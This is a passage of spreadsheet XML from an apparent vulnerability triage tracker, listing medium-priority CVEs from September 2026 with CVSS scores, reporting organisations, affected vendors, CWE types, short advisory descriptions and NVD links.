          <t>CVE-2026-28613</t>
        </is>
      </c>
      <c r="D814" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E814" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F814" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G814" s="5" t="inlineStr"/>
      <c r="H814" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I814" s="5" t="inlineStr"/>
      <c r="J814" s="5" t="inlineStr"/>
      <c r="K814" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L814" s="5" t="inlineStr"/>
      <c r="M814" s="5" t="inlineStr"/>
      <c r="N814" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O814" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P814" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q814" s="5" t="inlineStr"/>
      <c r="R814" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S814"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T814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28613</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B815" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28626</t>
        </is>
      </c>
      <c r="D815" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E815" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F815" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G815" s="5" t="inlineStr"/>
      <c r="H815" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I815" s="5" t="inlineStr"/>
      <c r="J815" s="5" t="inlineStr"/>
      <c r="K815" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L815" s="5" t="inlineStr"/>
      <c r="M815" s="5" t="inlineStr"/>
      <c r="N815" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O815" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P815" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q815" s="5" t="inlineStr"/>
      <c r="R815" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S815"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T815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28626</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B816" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28656</t>
        </is>
      </c>
      <c r="D816" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E816" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F816" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G816" s="5" t="inlineStr"/>
      <c r="H816" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I816" s="5" t="inlineStr"/>
      <c r="J816" s="5" t="inlineStr"/>
      <c r="K816" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L816" s="5" t="inlineStr"/>
      <c r="M816" s="5" t="inlineStr"/>
      <c r="N816" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O816" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P816" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q816" s="5" t="inlineStr"/>
      <c r="R816" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="S816"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T816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28656</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B817" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45528</t>
        </is>
      </c>
      <c r="D817" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E817" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F817" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G817" s="5" t="inlineStr"/>
      <c r="H817" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I817" s="5" t="inlineStr"/>
      <c r="J817" s="5" t="inlineStr"/>
      <c r="K817" s="5" t="inlineStr"/>
      <c r="L817" s="5" t="inlineStr"/>
      <c r="M817" s="5" t="inlineStr"/>
      <c r="N817" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O817" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P817" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q817" s="5" t="inlineStr"/>
      <c r="R817" s="5" t="inlineStr">
        <is>
          <t>CWE-926</t>
        </is>
      </c>
      <c r="S817"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T817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45528</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B818" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69477</t>
        </is>
      </c>
      <c r="D818" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E818" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F818" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G818" s="5" t="inlineStr"/>
      <c r="H818" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I818" s="5" t="inlineStr"/>
      <c r="J818" s="5" t="inlineStr"/>
      <c r="K818" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L818" s="5" t="inlineStr"/>
      <c r="M818" s="5" t="inlineStr"/>
      <c r="N818" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O818" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P818" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q818" s="5" t="inlineStr"/>
      <c r="R818" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S818" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69477</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B819" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78627</t>
        </is>
      </c>
      <c r="D819" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E819" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F819" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G819" s="5" t="inlineStr"/>
      <c r="H819" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I819" s="5" t="inlineStr"/>
      <c r="J819" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K819" s="5" t="inlineStr"/>
      <c r="L819" s="5" t="inlineStr"/>
      <c r="M819" s="5" t="inlineStr"/>
      <c r="N819" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O819" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P819" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q819" s="5" t="inlineStr"/>
      <c r="R819" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S819"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T819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78627</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B820" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86806</t>
        </is>
      </c>
      <c r="D820" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E820" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F820" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G820" s="5" t="inlineStr"/>
      <c r="H820" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I820" s="5" t="inlineStr"/>
      <c r="J820" s="5" t="inlineStr"/>
      <c r="K820" s="5" t="inlineStr"/>
      <c r="L820" s="5" t="inlineStr"/>
      <c r="M820" s="5" t="inlineStr"/>
      <c r="N820" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O820" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P820" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q820" s="5" t="inlineStr"/>
      <c r="R820" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S820" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86806</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B821" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76561</t>
        </is>
      </c>
      <c r="D821" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E821" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F821" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G821" s="5" t="inlineStr"/>
      <c r="H821" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I821" s="5" t="inlineStr"/>
      <c r="J821" s="5" t="inlineStr"/>
      <c r="K821" s="5" t="inlineStr"/>
      <c r="L821" s="5" t="inlineStr"/>
      <c r="M821" s="5" t="inlineStr"/>
      <c r="N821" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O821" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P821" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q821" s="5" t="inlineStr"/>
      <c r="R821" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S821" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76561</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B822" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81349</t>
        </is>
      </c>
      <c r="D822" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E822" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F822" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G822" s="5" t="inlineStr"/>
      <c r="H822" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I822" s="5" t="inlineStr"/>
      <c r="J822" s="5" t="inlineStr"/>
      <c r="K822" s="5" t="inlineStr"/>
      <c r="L822" s="5" t="inlineStr"/>
      <c r="M822" s="5" t="inlineStr"/>
      <c r="N822" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O822" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P822" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q822" s="5" t="inlineStr"/>
      <c r="R822" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S822" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an os command ('os command injection') in Azure HDInsights allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81349</t>
        </is>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B823" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81806</t>
        </is>
      </c>
      <c r="D823" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E823" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F823" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G823" s="5" t="inlineStr"/>
      <c r="H823" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I823" s="5" t="inlineStr"/>
      <c r="J823" s="5" t="inlineStr"/>
      <c r="K823" s="5" t="inlineStr"/>
      <c r="L823" s="5" t="inlineStr"/>
      <c r="M823" s="5" t="inlineStr"/>
      <c r="N823" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O823" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P823" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q823" s="5" t="inlineStr"/>
      <c r="R823" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S823" s="5" t="inlineStr">
        <is>
          <t>Server-Side Request Forgery (SSRF) vulnerability in John Darrel Hide My WP Ghost allows Server Side Request Forgery.
This issue affects Hide My WP Ghost: from n/a through 7.0.09.</t>
        </is>
      </c>
      <c r="T823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81806</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B824" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82061</t>
        </is>
      </c>
      <c r="D824" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E824" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F824" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G824" s="5" t="inlineStr"/>
      <c r="H824" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I824" s="5" t="inlineStr"/>
      <c r="J824" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K824" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L824" s="5" t="inlineStr"/>
      <c r="M824" s="5" t="inlineStr"/>
      <c r="N824" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O824" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P824" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q824" s="5" t="inlineStr"/>
      <c r="R824" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S824"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T824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B825" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82071</t>
        </is>
      </c>
      <c r="D825" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E825" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F825" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G825" s="5" t="inlineStr"/>
      <c r="H825" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I825" s="5" t="inlineStr"/>
      <c r="J825" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K825" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L825" s="5" t="inlineStr"/>
      <c r="M825" s="5" t="inlineStr"/>
      <c r="N825" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O825" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P825" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q825" s="5" t="inlineStr"/>
      <c r="R825" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S825"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T825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B826" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84387</t>
        </is>
      </c>
      <c r="D826" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E826" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F826" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G826" s="5" t="inlineStr"/>
      <c r="H826" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I826" s="5" t="inlineStr"/>
      <c r="J826" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K826" s="5" t="inlineStr"/>
      <c r="L826" s="5" t="inlineStr"/>
      <c r="M826" s="5" t="inlineStr"/>
      <c r="N826" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O826" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P826" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q826" s="5" t="inlineStr"/>
      <c r="R826" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S826"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T826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84387</t>
        </is>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B827" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86733</t>
        </is>
      </c>
      <c r="D827" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E827" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F827" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G827" s="5" t="inlineStr"/>
      <c r="H827" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I827" s="5" t="inlineStr"/>
      <c r="J827" s="5" t="inlineStr"/>
      <c r="K827" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L827" s="5" t="inlineStr"/>
      <c r="M827" s="5" t="inlineStr"/>
      <c r="N827" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O827" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P827" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q827" s="5" t="inlineStr"/>
      <c r="R827" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S827"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T827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86733</t>
        </is>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B828" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11573</t>
        </is>
      </c>
      <c r="D828" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E828" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F828" s="5" t="inlineStr">
        <is>
          <t>a59d8014-47c4-4630-ab43-e1b13cbe58e3</t>
        </is>
      </c>
      <c r="G828" s="5" t="inlineStr"/>
      <c r="H828" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I828" s="5" t="inlineStr"/>
      <c r="J828" s="5" t="inlineStr"/>
      <c r="K828" s="5" t="inlineStr"/>
      <c r="L828" s="5" t="inlineStr"/>
      <c r="M828" s="5" t="inlineStr"/>
      <c r="N828" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O828" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P828" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q828" s="5" t="inlineStr"/>
      <c r="R828" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S828"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T828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11573</t>
        </is>
      </c>
    </row>
    <row r="829">
      <c r="A829" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B829" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16769</t>
        </is>
      </c>
      <c r="D829" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E829" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F829" s="5" t="inlineStr">
        <is>
          <t>product-security@silabs.com</t>
        </is>
      </c>
      <c r="G829" s="5" t="inlineStr"/>
      <c r="H829" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I829" s="5" t="inlineStr"/>
      <c r="J829" s="5" t="inlineStr"/>
      <c r="K829" s="5" t="inlineStr"/>
      <c r="L829" s="5" t="inlineStr"/>
      <c r="M829" s="5" t="inlineStr"/>
      <c r="N829" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O829" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P829" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q829" s="5" t="inlineStr"/>
      <c r="R829" s="5" t="inlineStr">
        <is>
          <t>CWE-440</t>
        </is>
      </c>
      <c r="S829" s="5" t="inlineStr">
        <is>
          <t>An unencrypted 'pause encryption request' message causes a denial of service in the in the RS9116W/SiWx917. See vulnerability B-E10 in the related paper below.</t>
        </is>
      </c>
      <c r="T829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16769</t>
        </is>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B830" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20293</t>
        </is>
      </c>
      <c r="D830" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E830" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F830" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G830" s="5" t="inlineStr"/>
      <c r="H830" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I830" s="5" t="inlineStr"/>
      <c r="J830" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K830" s="5" t="inlineStr"/>
      <c r="L830" s="5" t="inlineStr"/>
      <c r="M830" s="5" t="inlineStr"/>
      <c r="N830" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O830" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P830" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q830" s="5" t="inlineStr"/>
      <c r="R830" s="5" t="inlineStr">
        <is>
          <t>CWE-749</t>
        </is>
      </c>
      <c r="S830"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T830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20293</t>
        </is>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B831" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66305</t>
        </is>
      </c>
      <c r="D831" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E831" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F831" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G831" s="5" t="inlineStr"/>
      <c r="H831" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I831" s="5" t="inlineStr"/>
      <c r="J831" s="5" t="inlineStr"/>
      <c r="K831" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L831" s="5" t="inlineStr"/>
      <c r="M831" s="5" t="inlineStr"/>
      <c r="N831" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O831" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P831" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q831" s="5" t="inlineStr"/>
      <c r="R831" s="5" t="inlineStr">
        <is>
          <t>CWE-603</t>
        </is>
      </c>
      <c r="S831" s="5" t="inlineStr">
        <is>
          <t>Use of client-side authentication in Skype for Business allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66305</t>
        </is>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B832" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68835</t>
        </is>
      </c>
      <c r="D832" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E832" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F832" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G832" s="5" t="inlineStr"/>
      <c r="H832" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I832" s="5" t="inlineStr"/>
